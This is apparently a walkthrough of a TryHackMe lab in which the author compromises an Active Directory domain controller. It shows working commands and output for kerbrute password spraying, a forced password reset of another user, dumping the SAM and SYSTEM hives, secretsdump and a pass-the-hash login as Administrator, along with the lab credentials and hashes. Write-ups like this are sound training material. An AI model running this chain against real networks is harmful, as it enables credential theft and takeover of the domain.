Introduction
In this walkthrough, we’ll be solving the K2: The Middle Camp room on TryHackMe, the second stage of the K2 challenge series.
Unlike standalone rooms, K2 is a multi-stage penetration testing scenario, where each machine builds on the previous one. This means the credentials, usernames, and information gathered during Base Camp play a crucial role in successfully attacking this machine.
The Middle Camp focuses heavily on Active Directory (AD) enumeration, credential reuse, and lateral movement, simulating real-world enterprise environments. You’ll learn how attackers move from initial access to deeper control within a domain.
This guide is designed to walk you through the entire process step-by-step — from enumeration to privilege escalation — while explaining the reasoning behind each action.
Whether you’re preparing for certifications or improving your red team skills, this walkthrough will help you understand how real-world AD attacks are performed.
What You’ll Learn
- Active Directory enumeration techniques (Kerberos, LDAP, SMB)
- Username discovery and password spraying
- Gaining initial access using reused credentials
- Lateral movement using BloodHound insights
- Privilege escalation to Domain Administrator
Room Overview
- Platform: TryHackMe
- Room: K2 – The Middle Camp
- Difficulty: Medium / Hard
- Category: Active Directory / Network Exploitation
- Prerequisite: Completion of Base Camp, AD Knowledge (Kerberos Username Enumeration and Brute Force), Bloodhound, Privilege Escalation, Pass the Hash etc..
Enumeration
nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
3389/tcp open ms-wbt-server
5985/tcp open wsman
7680/tcp open pando-pub
9389/tcp open adws
49669/tcp open unknown
49676/tcp open unknown
49677/tcp open unknown
49678/tcp open unknown
49681/tcp open unknown
49707/tcp open unknown
49817/tcp open unknown
┌──(alen㉿kali)-[~/Downloads/k2]
└─$ nmap -A -p 53,88,135,139,389,445,3389 k2.thm
Starting Nmap 7.95 ( https://nmap.org ) at 2025-04-02 12:50 +04
Nmap scan report for k2.thm (10.10.254.233)
Host is up (0.15s latency).
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-04-02 08:50:37Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: k2.thm0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
3389/tcp open ms-wbt-server Microsoft Terminal Services
| ssl-cert: Subject: commonName=K2Server.k2.thm
| Not valid before: 2025-04-01T08:42:55
|_Not valid after: 2025-10-01T08:42:55
|_ssl-date: 2025-04-02T08:51:36+00:00; +1s from scanner time.
| rdp-ntlm-info:
| Target_Name: K2
| NetBIOS_Domain_Name: K2
| NetBIOS_Computer_Name: K2SERVER
| DNS_Domain_Name: k2.thm
| DNS_Computer_Name: K2Server.k2.thm
| DNS_Tree_Name: k2.thm
| Product_Version: 10.0.17763
|_ System_Time: 2025-04-02T08:50:56+00:00
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2019|10 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2019 cpe:/o:microsoft:windows_10
Aggressive OS guesses: Windows Server 2019 (97%), Microsoft Windows 10 1903 - 21H1 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 2 hops
Service Info: Host: K2SERVER; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb2-time:
| date: 2025-04-02T08:50:58
|_ start_date: N/A
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
TRACEROUTE (using port 139/tcp)
HOP RTT ADDRESS
1 145.96 ms 10.14.0.1
2 146.11 ms k2.thm (10.10.254.233)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 67.43 seconds
By doing agressive scan we have found out that the domain name is k2server.k2.thm so we have to add it to /etc/hosts file
Creating usernames from Username Anarchy
So for the middle camp they have told us to use the information that we have got from solving the base camp
so we have the full names of the two users such as James Bold and Rose Bud
so we have to find the possible usernames in the active directory using these two names
Using username anarchy lets you create the list of probable usernames
┌──(alen㉿kali)-[~/Downloads/Tools/username-anarchy]
└─$ ./username-anarchy James Bold
james
jamesbold
james.bold
jamesbol
jamebold
jamesb
j.bold
jbold
bjames
b.james
boldj
bold
bold.j
bold.james
jb
┌──(alen㉿kali)-[~/Downloads/Tools/username-anarchy]
└─$ ./username-anarchy Rose Bud
rose
rosebud
rose.bud
roseb
r.bud
rbud
brose
b.rose
budr
bud
bud.r
bud.rose
rb
We can store the list of probable usernames in users.txt file
Username Enumeration using Kerbrute
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ ./kerbrute_linux_amd64 userenum --dc k2server.k2.thm -d k2.thm ~/Downloads/k2/users.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ / ___/ __ / ___/ / / / __/ _
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|___/_/ /_.___/_/ __,_/__/___/
Version: v1.0.3 (9dad6e1) - 04/02/25 - Ronnie Flathers @ropnop
2025/04/02 12:59:17 > Using KDC(s):
2025/04/02 12:59:17 > k2server.k2.thm:88
2025/04/02 12:59:17 > [+] VALID USERNAME: j.bold@k2.thm
2025/04/02 12:59:17 > [+] VALID USERNAME: r.bud@k2.thm
2025/04/02 12:59:17 > Done! Tested 28 usernames (2 valid) in 0.595 seconds
So we have found the 2 usernames now we have to check if there is any valid passwords can we use from the base camp
┌──(alen㉿kali)-[~/Downloads/k2]
└─$ cat passwords.txt
Pwd@9tLNrC3!
RdzQ7MSKt)fNaz3!
vRMkaVgdfxhW!8
So we have list of passwords now we have use the brute user option to spray these passwords to j.bold and r.bud respectively to see which works
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ ./kerbrute_linux_amd64 bruteuser --dc k2server.k2.thm -d k2.thm ~/Downloads/k2/passwords.txt r.bud
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ / ___/ __ / ___/ / / / __/ _
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|___/_/ /_.___/_/ __,_/__/___/
Version: v1.0.3 (9dad6e1) - 04/02/25 - Ronnie Flathers @ropnop
2025/04/02 13:08:50 > Using KDC(s):
2025/04/02 13:08:50 > k2server.k2.thm:88
2025/04/02 13:08:51 > [+] VALID LOGIN: r.bud@k2.thm:vRMkaVgdfxhW!8
2025/04/02 13:08:51 > Done! Tested 3 logins (1 successes) in 0.631 seconds
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ ./kerbrute_linux_amd64 bruteuser --dc k2server.k2.thm -d k2.thm ~/Downloads/k2/passwords.txt j.bold
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ / ___/ __ / ___/ / / / __/ _
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|___/_/ /_.___/_/ __,_/__/___/
Version: v1.0.3 (9dad6e1) - 04/02/25 - Ronnie Flathers @ropnop
2025/04/02 13:09:11 > Using KDC(s):
2025/04/02 13:09:11 > k2server.k2.thm:88
2025/04/02 13:09:11 > Done! Tested 3 logins (0 successes) in 0.364 seconds
So we have found the Valid AD Credentials
r.bud@k2.thm:vRMkaVgdfxhW!8
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ evil-winrm -u r.bud -p vRMkaVgdfxhW!8 -i k2.thm
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:Usersr.budDocuments> dir
Directory: C:Usersr.budDocuments
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 1/29/2024 7:07 PM 327 notes.txt
-a---- 1/29/2024 7:09 PM 349 note_to_james.txt
*Evil-WinRM* PS C:Usersr.budDocuments> type notes.txt
Done:
1. Note was sent and James has already performed the required action. They have informed me that they kept the base password the same, they just added two more characters to meet the criteria. It is easier for James to remember it that way.
2. James's password meets the criteria.
Pending:
1. Give James Remote Access.
*Evil-WinRM* PS C:Usersr.budDocuments> type note_to_james.txt
Hello James:
Your password "rockyou" was found to only contain alphabetical characters. I have removed your Remote Access for now.
At the very least adhere to the new password policy:
1. Length of password must be in between 6-12 characters
2. Must include at least 1 special character
3. Must include at least 1 number between the range of 0-999
*Evil-WinRM* PS C:Usersr.budDocuments>
So we have found the note and talks about the password policy
so we have to find the passwords according to this password policy
Creating Custom Password using John The Ripper
We had to create a custom rule in john the ripper using the password policy
[List.Rules:Custom]
^[0-9]^[!@#$] # adds a number and a special character at the beginning
^[0-9]^[0-9]^[!@#$] # adds two numbers and a special character at the beginning
^[0-9]^[0-9]^[0-9]^[!@#$] # adds three numbers and a special character at the beginning
$[0-9]$[!@#$] # adds a number and a special character at the end
$[0-9]$[0-9]$[!@#$] # adds two numbers and a special character at the end
$[0-9]$[0-9]$[0-9]$[!@#$] # adds three numbers and a special character at the end
then use the command
┌──(alen㉿kali)-[~/Downloads]
└─$ john --wordlist=passrock.txt --rules=Custom --stdout > passwdrock
to output the combinations in passwdrock
Using Bruteuser of Kerbrute against j.bold
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ ./kerbrute_linux_amd64 bruteuser --dc k2server.k2.thm -d k2.thm ~/Downloads/passwdrock j.bold
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ / ___/ __ / ___/ / / / __/ _
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|___/_/ /_.___/_/ __,_/__/___/
Version: v1.0.3 (9dad6e1) - 04/02/25 - Ronnie Flathers @ropnop
2025/04/02 20:53:01 > Using KDC(s):
2025/04/02 20:53:01 > k2server.k2.thm:88
2025/04/02 20:53:02 > [+] VALID LOGIN: j.bold@k2.thm:#8rockyou
2025/04/02 20:53:03 > Done! Tested 64 logins (1 successes) in 2.170 seconds
from the notes we can understand that james doesnot have remote access
Bloodhound and Neo4j
use sudo neo4j console in one terminal and bloohound in another
to get the loot use the ad-bloodhound script from tyler
we get 7 files and we can upload the json files and we can see the map of AD
when you search for j.bold and you look at the member you can see that it is a member of it staff 1 and j.smith has generic all to the it staff 1
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ net rpc password "j.smith" "AlenBenedict123" -U "k2.thm"/"j.bold"%"#8rockyou" -S "k2server.k2.thm"
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ evil-winrm -u j.smith -p AlenBenedict123 -i k2.thm
*Evil-WinRM* PS C:Usersj.smithDesktop> cat user.txt
THM{********************************}
We can actually see that j.smith is member of backup operators
We can use this article to perform backup operator privesc
Backup Operator comes under an interesting group category
Performs the steps from the article
*Evil-WinRM* PS C:Usersj.smithDesktop> reg save hklmsam c:WindowsTasksSAM
The operation completed successfully.
*Evil-WinRM* PS C:Usersj.smithDesktop> reg save hklmsystem c:WindowsTasksSYSTEM
The operation completed successfully.
Then Download it to your system by download command in Evil Winrm
*Evil-WinRM* PS C:Users> download c:WindowsTasksSAM
Info: Downloading C:Usersc:WindowsTasksSAM to c:WindowsTasksSAM
Error: Download failed. Check filenames or paths
*Evil-WinRM* PS C:Users> cd ..
*Evil-WinRM* PS C:> cd Windows
*Evil-WinRM* PS C:Windows> cd Tasks
*Evil-WinRM* PS C:WindowsTasks> download SAM
Info: Downloading C:WindowsTasksSAM to SAM
Info: Download successful!
*Evil-WinRM* PS C:WindowsTasks> download SYSTEM
Info: Downloading C:WindowsTasksSYSTEM to SYSTEM
Info: Download successful!
*Evil-WinRM* PS C:WindowsTasks>
It failed when I was in the Users directory so I changed the directory to where the file was and the download worked
Secretsdump
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ impacket-secretsdump -sam SAM -system SYSTEM LOCAL
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies
[*] Target system bootKey: 0x36c8d26ec0df8b23ce63bcefa6e2d821
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:9545b61858c043477c350ae86c37b32f:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
[-] SAM hashes extraction for user WDAGUtilityAccount failed. The account doesn't have hash information.
[*] Cleaning up...
After extracting the hashes we can use the hash to perform Pass the Hash Attack onto the administrator account
Pass the Hash
┌──(alen㉿kali)-[~/Downloads/Tools]
└─$ evil-winrm -u administrator -H 9545b61858c043477c350ae86c37b32f -i k2.thm
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:UsersAdministratorDocuments> cd ..
*Evil-WinRM* PS C:UsersAdministrator> cd Desktop
*Evil-WinRM* PS C:UsersAdministratorDesktop> ls
Directory: C:UsersAdministratorDesktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 6/21/2016 3:36 PM 527 EC2 Feedback.website
-a---- 6/21/2016 3:36 PM 554 EC2 Microsoft Windows Guide.website
-a---- 5/29/2023 11:00 PM 37 root.txt
*Evil-WinRM* PS C:UsersAdministratorDesktop> cat root.txt
THM{********************************}
*Evil-WinRM* PS C:UsersAdministratorDesktop>